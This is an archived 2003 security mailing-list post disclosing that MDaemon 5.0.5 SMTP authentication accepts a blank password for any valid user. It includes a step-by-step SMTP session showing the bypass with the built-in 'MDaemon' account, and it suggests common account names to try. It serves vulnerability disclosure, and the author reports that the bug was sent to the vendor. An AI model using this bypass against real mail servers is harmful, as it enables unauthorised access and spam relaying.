Hello, There is a security problem on MDaemon 5.0.5 (maybe other versions affected as well) regarding smtp authentication. Blank password authenticates any valid user: For primary domain: User: VALIDUSER or VALIDUSERat_private Password: blank password For secondary domains: User: VALIDUSERat_private Password: blank password Using this vulnerability Spammers could abuse server even if relay control is properly configured. To abuse the server there is no need to get the userlist.dat and decode the well known weak encryption of MDeamon 5.0.6 and before (base64 encoded password plus one offset for each character (1byte)). If a valid user is required you could always built-in account "MDaemon" and the default password (see references) or blank password. You could also try with well known accounts (administrator, webmaster, info, spam, admin, etc.) Sample session: 220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200 EHLO localhost 250-xxx.com Hello localhost, pleased to meet you 250-ETRN 250-AUTH LOGIN CRAM-MD5 250-8BITMIME 250 SIZE 0 AUTH LOGIN 334 VXNlcm5hbWU6 (334 Username:) TURhZW1vbg== (MDaemon) 334 UGFzc3dvcmQ6 (334 Password:) (blank password) 235 Authentication successful Buckaroo Banzai PD: The bug has been submited to ALT-N References: related security issues regarding MDaemon 5 ------------------------------------------------------- http://www.securityfocus.com/bid/4689 http://www.securityfocus.com/bid/4686 http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0057.html
This archive was generated by hypermail 2b30 : Sat Aug 09 2003 - 10:42:48 PDT